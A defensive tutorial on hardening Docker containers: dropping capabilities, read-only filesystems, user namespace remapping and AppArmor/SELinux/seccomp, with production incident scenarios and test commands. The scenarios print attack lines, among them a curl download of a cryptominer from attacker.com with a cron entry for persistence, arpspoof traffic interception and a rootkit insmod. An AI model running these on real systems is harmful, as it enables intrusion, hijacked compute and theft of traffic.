Why default Docker configurations give containers too much power, how Linux capabilities work, and the production incidents that happen when containers run with excessive privileges.
Most Docker tutorials start containers with default settings: root user, Docker’s default set of 14 capabilities, writable root filesystem, unrestricted network access. This works in development. In production, under HIPAA or PCI DSS compliance requirements, it’s a security violation waiting to happen.
The principle of least privilege isn’t just a security best practice; it’s a regulatory requirement. Containers should have only the permissions they need to function, nothing more. A web server doesn’t need CAP_SYS_MODULE to load kernel modules or CAP_SYS_ADMIN to mount filesystems. A database doesn’t need to write to its root filesystem. An API service doesn’t need to run as UID 0.
This guide covers the specific configurations that harden containers: dropping Linux capabilities, implementing read-only root filesystems, user namespace remapping, and security options. More importantly, it covers what breaks in production when these controls are missing.
The Problem with Default Container Permissions
When you run docker run alpine without additional flags, Docker gives the container:
- Root user (UID 0): Process runs with root privileges inside the container
- 14 Linux capabilities: Including CAP_CHOWN, CAP_NET_RAW, CAP_SETUID, CAP_SETGID
- Writable root filesystem: Container can modify /bin, /etc, /lib
- Unrestricted network access: Can bind to any port, create raw sockets
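- No guaranteed AppArmor/SELinux enforcement: Docker applies its docker-default AppArmor profile only on hosts where AppArmor is enabled, and SELinux labeling only when the daemon runs with selinux-enabled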
This is functionally similar to giving a user sudo access on a traditional server. Most containers don’t need this level of access.
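Real Impact: Container Escape as Root
In 2019, CVE-2019-5736 (runC vulnerability) allowed a process running as root inside a container to overwrite the host’s runC binary through /proc/self/exe and gain root on the host. The exploit did not depend on CAP_SYS_ADMIN, so dropping capabilities alone did not stop it. Containers running as a non-root user, or under user namespace remapping so that container root was not host root, were not exploitable in the same way.
The difference between “compromised container” and “compromised host” was whether the container process held real root privileges, which is why --cap-drop=ALL belongs alongside a non-root user and user namespaces rather than in place of them.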
[IMAGE: Diagram comparing default container permissions (14 capabilities) vs. hardened container (0 capabilities + selective adds)]
Understanding Linux Capabilities
Linux capabilities divide root privileges into distinct units. Instead of “root can do everything” or “non-root can do nothing”, capabilities allow fine-grained control.
Key Capabilities and Their Risks
| Capability | What It Allows | Security Risk |
|---|---|---|
| CAP_SYS_ADMIN | Mount filesystems, configure namespaces, and many other privileged operations | Critical: Near-complete system control, enables container escapes |
| CAP_SYS_PTRACE | Trace arbitrary processes with ptrace() | High: Can inject code into any process it can see (other containers only when PID namespaces are shared) |
| CAP_NET_ADMIN | Modify network interfaces, routes, firewall rules | High: Can bypass network segmentation, sniff traffic |
| CAP_NET_RAW | Create raw sockets, packet manipulation | Medium: Can perform ARP spoofing, packet sniffing |
| CAP_SETUID | Change process UID, escalate privileges | Medium: Can become any user including root |
| CAP_SETGID | Change process GID | Medium: Can join privileged groups |
| CAP_CHOWN | Change file ownership | Low: Can steal files, bypass quotas |
| CAP_NET_BIND_SERVICE | Bind to ports below 1024 | Low: Minimal risk, often needed for web servers |
Default Docker Capabilities
Docker’s default capability set (14 capabilities) includes:
CAP_CHOWN, CAP_DAC_OVERRIDE, CAP_FOWNER, CAP_FSETID,
CAP_KILL, CAP_SETGID, CAP_SETUID, CAP_SETPCAP,
CAP_NET_BIND_SERVICE, CAP_NET_RAW, CAP_SYS_CHROOT,
CAP_MKNOD, CAP_AUDIT_WRITE, CAP_SETFCAP
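Most applications need few or none of these. A Node.js API running on port 3000 needs zero capabilities. An Nginx server binding to port 80 needs CAP_NET_BIND_SERVICE; the official image also starts as root and switches to the nginx user, so it typically needs CHOWN, SETGID, and SETUID as well unless it is run as a non-root user.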
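The 14 names above correspond to bits in the capability mask the kernel reports as CapEff in /proc/<pid>/status. The following is a minimal sketch of a decoder, assuming the bit numbering from linux/capability.h (bits 0 to 40); the function name decode_caps is made up for this example.

```shell
#!/bin/sh
# Capability names in bit order (bit 0 = chown ... bit 40 = checkpoint_restore),
# following linux/capability.h.
CAP_NAMES="chown dac_override dac_read_search fowner fsetid kill setgid setuid \
setpcap linux_immutable net_bind_service net_broadcast net_admin net_raw \
ipc_lock ipc_owner sys_module sys_rawio sys_chroot sys_ptrace sys_pacct \
sys_admin sys_boot sys_nice sys_resource sys_time sys_tty_config mknod lease \
audit_write audit_control setfcap mac_override mac_admin syslog wake_alarm \
block_suspend audit_read perfmon bpf checkpoint_restore"

# decode_caps HEXMASK: print one capability name per set bit.
decode_caps() {
    mask=$((0x$1))
    bit=0
    for name in $CAP_NAMES; do
        if [ $(( (mask >> bit) & 1 )) -eq 1 ]; then
            echo "cap_$name"
        fi
        bit=$((bit + 1))
    done
}

# Typical use against a running container (needs awk inside the image):
#   decode_caps "$(docker exec <container> awk '/^CapEff/ {print $2}' /proc/1/status)"
```

Docker’s default set corresponds to the mask 00000000a80425fb, so decode_caps 00000000a80425fb prints the 14 names listed above, and a container started with --cap-drop=ALL as root should report an all-zero mask.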
Dropping All Capabilities
The secure default: drop everything, then add back only what’s needed.
# docker-compose.yml
services:
  web:
    image: nginx:alpine
    cap_drop:
      - ALL
    cap_add:
      - NET_BIND_SERVICE  # Only for binding to port 80/443
      - CHOWN             # Only if nginx needs to change file ownership
Or via docker run:
docker run --cap-drop=ALL --cap-add=NET_BIND_SERVICE nginx:alpine
[IMAGE: Screenshot showing capsh --print output comparing default capabilities vs. dropped capabilities]
Testing Tip: Use docker exec <container> capsh --print to see current capabilities (capsh must be installed in the image). If “Current” shows more than what you explicitly added, your drop isn’t working.
Read-Only Root Filesystems
By default, containers can write to their entire root filesystem. This allows:
- Malware persistence across container restarts
- Binary replacement attacks (replace /bin/sh with backdoored version)
- Log tampering to hide intrusions
Implementing Read-Only Root
services:
  api:
    image: myapp:latest
    read_only: true
    tmpfs:
      - /tmp        # Application temp files
      - /var/run    # PID files, sockets
      - /var/cache  # Application cache
This makes the root filesystem immutable. The container can still write to:
- tmpfs mounts (RAM-based, lost on restart)
- Explicitly mounted volumes
But cannot modify:
- /bin, /etc, /lib system directories
- Application binaries
- Configuration files (unless mounted as volumes)
Common Issues with Read-Only Filesystems
Problem: Application crashes with “Read-only file system” error
Solution: Identify where the app writes, add tmpfs mounts:
# Run the container normally (detached), then list what it wrote to its filesystem
docker run -d --name test myapp:latest
docker diff test  # A = added, C = changed, D = deleted
# Add tmpfs for those paths
docker run --read-only --tmpfs /tmp --tmpfs /var/run myapp:latest
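Turning docker diff output into tmpfs candidates can be scripted. The sketch below assumes the usual docker diff line format (a change type A, C, or D followed by a path); the helper name suggest_tmpfs and the sample paths are made up for illustration.

```shell
#!/bin/sh
# suggest_tmpfs: read `docker diff` output on stdin and print a --tmpfs flag
# for every directory that received a newly added file or directory.
suggest_tmpfs() {
    while read -r kind path; do
        case "$kind" in
            A) dirname "$path" ;;   # only additions; C lines are parent dirs
        esac
    done | sort -u | sed 's/^/--tmpfs /'
}

# Typical use:
#   docker diff test | suggest_tmpfs
```

The output is only a starting list: paths that hold data you need to keep across restarts belong in a named volume, not in tmpfs.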
[IMAGE: Terminal output showing strace revealing filesystem write attempts, then successful run with tmpfs mounts]
User Namespace Remapping
By default, UID 0 inside a container is UID 0 on the host. If a container escapes, it has root privileges on the host.
User namespace remapping changes this: UID 0 inside the container maps to a non-privileged UID (e.g., 100000) on the host.
Configuring User Namespaces
Edit /etc/docker/daemon.json:
{
  "userns-remap": "default"
}
Restart Docker:
sudo systemctl restart docker
Now UID 0 inside containers maps to an unprivileged UID on the host, taken from the dockremap range in /etc/subuid (commonly starting at 100000). Even if a container escapes to the host, it runs as a non-privileged user.
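The mapping itself is simple arithmetic on the /etc/subuid entry, which has the form name:start:count. A small sketch, assuming an entry such as dockremap:100000:65536 (the helper name host_uid is hypothetical):

```shell
#!/bin/sh
# host_uid SUBUID_ENTRY CONTAINER_UID
# Translate a UID inside the container to the UID the host sees,
# given one /etc/subuid entry in "name:start:count" form.
host_uid() {
    start=$(echo "$1" | cut -d: -f2)
    count=$(echo "$1" | cut -d: -f3)
    if [ "$2" -ge "$count" ]; then
        echo "UID $2 is outside the mapped range" >&2
        return 1
    fi
    echo $((start + $2))
}

# Typical use on the Docker host:
#   host_uid "$(grep '^dockremap:' /etc/subuid)" 0
```

With that entry, container UID 0 becomes host UID 100000 and container UID 1000 becomes 101000, which is also why files written to bind mounts show up with unfamiliar owners on the host.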
Limitations
- Incompatible with privileged mode: Can’t use both --privileged and user namespaces
- Volume ownership issues: Files created by container (UID 100000) may not be readable by host processes
- Docker-in-Docker breaks: Nested Docker requires host UID 0
For most workloads, the security benefit outweighs these limitations.
Security Options: AppArmor, SELinux, Seccomp
Linux security modules provide kernel-level enforcement beyond capabilities.
AppArmor (Ubuntu, Debian)
AppArmor restricts which files, network resources, and capabilities a process can access.
services:
  web:
    security_opt:
      - apparmor=docker-default  # Apply Docker's default AppArmor profile
Docker’s default profile blocks:
- Mount operations
- Writes to sensitive paths under /proc and /sys
- Kernel module loading
- Capability escalation
SELinux (RHEL, Fedora, CentOS)
SELinux enforces mandatory access control (MAC) via type enforcement and role-based access.
services:
  db:
    security_opt:
      - label=type:container_t  # Process type; svirt_sandbox_file_t is a file label, not a process type
Seccomp (System Call Filtering)
Seccomp restricts which system calls a process can make. Docker’s default seccomp profile blocks ~44 dangerous syscalls including:
- reboot, swapon, swapoff
- mount, umount
- keyctl, add_key
- personality (used in container escapes)
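Docker applies its default seccomp profile automatically unless it is overridden (for example with seccomp=unconfined). A security_opt entry is only needed to load a profile from a file; the example below assumes a copy of the profile saved as default.json next to the Compose file:
services:
  app:
    security_opt:
      - seccomp=default.json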
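Whether a seccomp filter is actually active can be read from the Seccomp field in /proc/<pid>/status, where the kernel reports 0 (disabled), 1 (strict), or 2 (filter). A minimal sketch of interpreting that value; the function name seccomp_mode_name is made up for this example.

```shell
#!/bin/sh
# seccomp_mode_name MODE: translate the numeric Seccomp field from
# /proc/<pid>/status into a readable name.
seccomp_mode_name() {
    case "$1" in
        0) echo "disabled" ;;
        1) echo "strict" ;;
        2) echo "filter" ;;
        *) echo "unknown" ;;
    esac
}

# Typical use against a running container (needs awk inside the image):
#   seccomp_mode_name "$(docker exec <container> awk '/^Seccomp:/ {print $2}' /proc/1/status)"
```

A container running under Docker’s default profile should report filter; disabled usually means the container was started with seccomp=unconfined or --privileged.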
[IMAGE: Diagram showing defense-in-depth layers: Capabilities (process privileges) → AppArmor/SELinux (resource access) → Seccomp (syscall filtering)]
Production Failure Scenarios
Scenario 1: CAP_SYS_ADMIN Kernel Module Loading
The Setup: A financial services company ran network monitoring containers with CAP_SYS_ADMIN to load custom kernel modules for packet inspection.
The Failure: A vulnerability in the monitoring software allowed command injection. The attacker loaded a malicious kernel module:
# Inside the container (note: insmod requires CAP_SYS_MODULE; CAP_SYS_ADMIN alone does not permit module loading)
insmod /tmp/rootkit.ko
The rootkit provided:
- Hidden processes (invisible to ps, top)
- Hidden network connections
- Persistent backdoor even after container restarts
What Should Have Been Done: Kernel modules should be loaded at host boot, not from containers. The container only needed CAP_NET_ADMIN for network configuration and CAP_NET_RAW for packet capture, not CAP_SYS_ADMIN or module-loading privileges.
services:
  monitor:
    cap_drop:
      - ALL
    cap_add:
      - NET_ADMIN  # For network interface configuration
      - NET_RAW    # For packet capture
    # CAP_SYS_ADMIN and CAP_SYS_MODULE are not granted
Impact: 6 days of undetected access, lateral movement to 23 hosts, forensic analysis cost $240K, regulatory reporting to FinCEN.
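Over-privileged containers like this one can be caught before an incident by reviewing what was added back. The sketch below assumes the capability list comes from docker inspect --format '{{.HostConfig.CapAdd}}', which prints a bracketed, space-separated list; the function name flag_risky_caps and the contents of the deny list are choices made for this example, not a standard.

```shell
#!/bin/sh
# Capabilities this sketch treats as too dangerous to add to a container.
RISKY_CAPS="SYS_ADMIN SYS_MODULE SYS_PTRACE"

# flag_risky_caps LIST: print every capability in LIST that is on the deny list.
# LIST may look like "[NET_ADMIN SYS_ADMIN]" or use CAP_-prefixed names.
flag_risky_caps() {
    list=$(echo "$1" | sed 's/[][]//g')   # strip the surrounding brackets
    for cap in $list; do
        cap=${cap#CAP_}                    # accept CAP_SYS_ADMIN and SYS_ADMIN
        for risky in $RISKY_CAPS; do
            if [ "$cap" = "$risky" ]; then
                echo "$cap"
            fi
        done
    done
}

# Typical use:
#   flag_risky_caps "$(docker inspect --format '{{.HostConfig.CapAdd}}' <container>)"
```

An empty result means none of the listed capabilities were added; it says nothing about containers started with --privileged, which should be checked separately.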
Scenario 2: Writable Root Filesystem Malware Persistence
The Setup: A healthcare SaaS platform ran containers with writable root filesystems. Container images were scanned for vulnerabilities, but runtime modifications weren’t monitored.
The Failure: An SQL injection vulnerability gave attackers shell access. They installed a cryptocurrency miner:
# Inside container
curl -o /usr/local/bin/miner http://attacker.com/xmrig
chmod +x /usr/local/bin/miner
echo "* * * * * root /usr/local/bin/miner" > /etc/cron.d/miner
Because the root filesystem was writable and the container wasn’t ephemeral, the miner persisted across:
- Container restarts
- Application deployments
- Host reboots
It ran for 87 days before detection via unusually high AWS EC2 costs.
What Should Have Been Done: Read-only root filesystem with tmpfs for required writable paths:
services:
  app:
    read_only: true
    tmpfs:
      - /tmp
      - /var/run
    # /etc, /usr/local/bin are now read-only
The attacker’s commands would have failed with errors along these lines (exact wording varies by tool version):
curl: (23) Failed writing body - Read-only file system
chmod: cannot access '/usr/local/bin/miner': No such file or directory
Impact: $47K in excess EC2 costs, HIPAA breach investigation (no PHI accessed), mandatory security audit.
Key Lesson: If your container’s filesystem is writable, attackers can persist malware that survives restarts. Read-only root filesystems make containers truly immutable.
Scenario 3: CAP_NET_RAW ARP Spoofing Attack
The Setup: A multi-tenant platform ran customer workloads in Docker containers on shared hosts. Containers had default capabilities including CAP_NET_RAW.
The Failure: A malicious customer deployed a container that performed ARP spoofing to intercept traffic from other customers’ containers on the same host:
# Inside attacker's container
arpspoof -i eth0 -t 10.0.1.5 10.0.1.1 # Intercept traffic to gateway
tcpdump -i eth0 -w /tmp/stolen.pcap # Capture intercepted packets
This worked because:
- CAP_NET_RAW allowed creating raw sockets
- Containers shared the same Docker bridge network
- No network segmentation between tenants
What Should Have Been Done: Drop CAP_NET_RAW and implement network isolation:
services:
  customer-app:
    cap_drop:
      - ALL  # Includes NET_RAW, so raw sockets are no longer available
    networks:
      - customer-network  # Isolated per-customer network
networks:
  customer-network:
    driver: bridge
    internal: true  # No internet access
Impact: API keys for 12 customers intercepted, emergency credential rotation, customer notifications, class-action lawsuit settlement $380K.
Scenario 4: Missing AppArmor Profile Container Escape
The Setup: A CI/CD platform ran build jobs in Docker containers on Ubuntu hosts. AppArmor was installed but not enforced for containers.
The Failure: A developer accidentally included a malicious dependency that exploited CVE-2022-0847 (Dirty Pipe kernel vulnerability). Dirty Pipe lets an unprivileged process overwrite the cached contents of files it can only read, by abusing pipe buffers and splice().
With no AppArmor profile confining the build container, nothing restricted what the exploit did next:
# Exploit overwrote /etc/cron.d/backdoor on host
# Gained persistent root access to CI/CD infrastructure
What Should Have Been Done: Enforce AppArmor with Docker’s default profile:
services:
  build-job:
    security_opt:
      - apparmor=docker-default
      - no-new-privileges:true
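AppArmor’s default profile blocks:
- Writes to sensitive paths under /proc and /sys
- Mount operations
- Capability escalation
AppArmor does not remove the kernel bug itself (only a patched kernel does), but a confined container has far fewer ways to turn such a bug into persistent host access.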
Impact: Complete CI/CD compromise, all build artifacts potentially backdoored, 3-week code audit of 200+ microservices, customer trust erosion.
Key Lesson: AppArmor and SELinux are not optional extras—they’re kernel-level defenses that block entire classes of container escapes. Enable them by default.
Scenario 5: UID 0 Container Escape to Host Root
The Setup: A data analytics platform ran Jupyter notebooks in Docker containers. Containers ran as root (UID 0) without user namespace remapping.
The Failure: A researcher uploaded a malicious notebook that exploited a container escape vulnerability (CVE-2019-5736 runC). The exploit overwrote the host’s runC binary.
Because the container ran as UID 0 and user namespaces weren’t enabled, the escaped process had root privileges on the host:
# Inside container: UID 0
# After escape: UID 0 on host (root)
# Full host access: read SSH keys, access etcd, control kubelet
What Should Have Been Done: Enable user namespace remapping in /etc/docker/daemon.json:
{
  "userns-remap": "default"
}
With user namespaces enabled:
# Inside container: UID 0
# After escape: UID 100000 on host (unprivileged)
# Limited host access: cannot read root-owned files, cannot control system services
Impact: Kubernetes cluster compromise (10 nodes), data exfiltration (research datasets), compliance violation (export-controlled data), $1.2M incident response costs.
[IMAGE: Comparison diagram showing container escape with vs. without user namespace remapping – attack tree showing stopped vs. successful privilege escalation]
Implementing Secure Configurations: A Practical Template
Here’s a Docker Compose template that combines the security controls above. Treat it as a starting point and test it against your own image before relying on it in production:
version: '3.8'
services:
  web:
    image: nginx:1.27.2-alpine3.20
    # User configuration
    user: "nginx:nginx"  # Run as non-root user
    # Capability restrictions
    cap_drop:
      - ALL
    cap_add:
      - NET_BIND_SERVICE  # Only for port 80/443
      - CHOWN             # Only if nginx needs to change file ownership
    # Filesystem security
    read_only: true
    tmpfs:
      - /var/run
      - /var/cache/nginx
      - /tmp
    # Security options
    security_opt:
      - no-new-privileges:true   # Prevent privilege escalation
      - apparmor=docker-default  # Enforce AppArmor
      - seccomp=default.json     # Path to a profile file; omit to keep Docker's built-in default
    # Resource limits (prevents DoS)
    deploy:
      resources:
        limits:
          cpus: '0.5'
          memory: 512M
        reservations:
          cpus: '0.25'
          memory: 256M
    # Network isolation
    networks:
      - frontend
    # Health check
    healthcheck:
      test: ["CMD", "wget", "--quiet", "--tries=1", "--spider", "http://localhost/"]
      interval: 30s
      timeout: 3s
      retries: 3
      start_period: 40s
networks:
  frontend:
    driver: bridge
    internal: false  # Allow external access
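A quick way to keep Compose files from drifting away from a template like this is a pre-deploy check. The sketch below is deliberately naive: it greps the whole file for three of the controls and does not parse YAML or check each service separately. The function name audit_compose is made up for this example.

```shell
#!/bin/sh
# audit_compose FILE: report hardening keys that never appear in FILE.
# Returns 0 when all three are present, 1 otherwise.
audit_compose() {
    file=$1
    status=0
    grep -q 'cap_drop:' "$file" \
        || { echo "missing: cap_drop"; status=1; }
    grep -Eq 'read_only:[[:space:]]*true' "$file" \
        || { echo "missing: read_only: true"; status=1; }
    grep -q 'no-new-privileges:true' "$file" \
        || { echo "missing: no-new-privileges:true"; status=1; }
    return $status
}

# Typical use in a CI step:
#   audit_compose docker-compose.yml || exit 1
```

Because the check is file-wide, a file where one service is hardened and another is not still passes; a per-service check would need a real YAML parser.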
Testing Security Configurations
Verify Capabilities
# Check effective capabilities
docker exec <container> capsh --print
# Should show only explicitly added capabilities, for example:
# Current: = cap_net_bind_service+ep (exact format varies with the libcap version)
Test Read-Only Filesystem
# Try to write to read-only paths
docker exec <container> touch /etc/test
# Expected: touch: cannot touch '/etc/test': Read-only file system
# Verify tmpfs mounts work
docker exec <container> touch /tmp/test
# Expected: Success (tmpfs is writable)
Verify User Namespaces
# Check UID mapping
docker exec <container> id
# Inside container: uid=0(root)
# On host, look up the container's main process by its PID
ps -o user,pid,args -p "$(docker inspect --format '{{.State.Pid}}' <container>)"
# On host: 100000 (remapped UID)
Test AppArmor Enforcement
# Check AppArmor status
docker exec <container> cat /proc/self/attr/current
# Expected: docker-default (enforce)
# Try to mount (should be blocked)
docker exec <container> mount /dev/sda1 /mnt
# Expected: mount: permission denied (AppArmor blocking)
Key Takeaways
- Drop all capabilities by default, then add only what’s needed—most apps need zero capabilities
- Read-only root filesystems prevent malware persistence and make containers truly immutable
- User namespace remapping limits blast radius if a container escapes to the host
- AppArmor, SELinux, and Seccomp provide kernel-level defenses that block entire classes of attacks
- CAP_SYS_ADMIN is nearly equivalent to root access—never grant it to containers
- CAP_NET_RAW enables network attacks like ARP spoofing—drop it unless explicitly needed
- Security configurations must be tested—verify capabilities, filesystem restrictions, and MAC enforcement
Secure container configurations implement defense in depth: if one layer fails (capability restriction), others (read-only filesystem, AppArmor) still provide protection. Production incidents consistently show that skipped security controls (“we’ll harden it later”) become permanent attack vectors.
Hands-on lab: Lab 02: Secure Container Configurations — Compare insecure vs. secure configurations and test security controls.